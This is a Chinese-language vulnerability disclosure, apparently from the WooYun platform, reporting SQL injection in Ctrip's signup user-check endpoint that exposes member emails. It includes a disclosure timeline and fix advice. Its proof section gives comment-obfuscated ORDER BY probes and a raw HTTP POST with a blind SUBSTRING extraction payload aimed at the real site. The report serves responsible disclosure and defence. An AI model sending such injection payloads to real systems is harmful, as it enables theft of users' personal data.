携程网某ajax验证存在sql注入

漏洞详情

披露状态：

2010-07-30： 细节已通知厂商并且等待厂商处理中
2010-07-30： 厂商已经确认，细节仅向厂商公开
2010-08-09： 细节向核心白帽子及相关领域专家公开
2010-08-19： 细节向普通白帽子公开
2010-08-29： 细节向实习白帽子公开
2010-08-29： 细节向公众公开

简要描述：

位置较敏感，发生在members表，可以发现表的一些字段，能够窃取任何人的包括email等信息，未深入测试

详细说明：

用户注册时，"验证用户是否存在"因过滤不严谨导致sql注入
另外：
http://www.ctrip.com/robots.txt
http://destguides.ctrip.com/destguides/journals/AllSingleJournals.aspx?Writing=130079''3
暴露了敏感信息

漏洞证明：

http://www.ctrip.com/member/CheckUser.asp
post: signup_uid=xyyxx1x'/**/order/**/by/**/1--
post: signup_uid=xyyxx1x'/**/order/**/by/**/uid--
post: signup_uid=xyyxx1x'/**/order/**/by/**/email--
尝试不正确的字段导致不同结果，输入".`"等字符及其它注入手段测试（可能存在ids）

1.  
   POST /member/CheckUser.asp HTTP/1.1
2.  
   Accept: */*
3.  
   Accept-Language: en-US,zh-cn;q=0.5
4.  
   Referer: http://www.ctrip.com/member/signup.asp
5.  
   If-Modified-Since: Thu Jan 1 08:00:00 UTC 0800 1970
6.  
   Content-Type: application/x-www-form-urlencoded
7.  
   User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)
8.  
   Host: www.ctrip.com
9.  
   Content-Length: 94
10.  
    Connection: Keep-Alive
11.  
    Cache-Control: no-cache
12.  
    Cookie:
13.  
    signup_uid=jquery1'/*and*/and/**/sUbstRing(email,1,1)=char(0)/**/order/**/by/*and 1=1*/email--

修复方案：

1.白名单验证
2.屏蔽或友好提示错误

版权声明：转载请注明来源 路人甲@乌云

本篇文章来至：学新通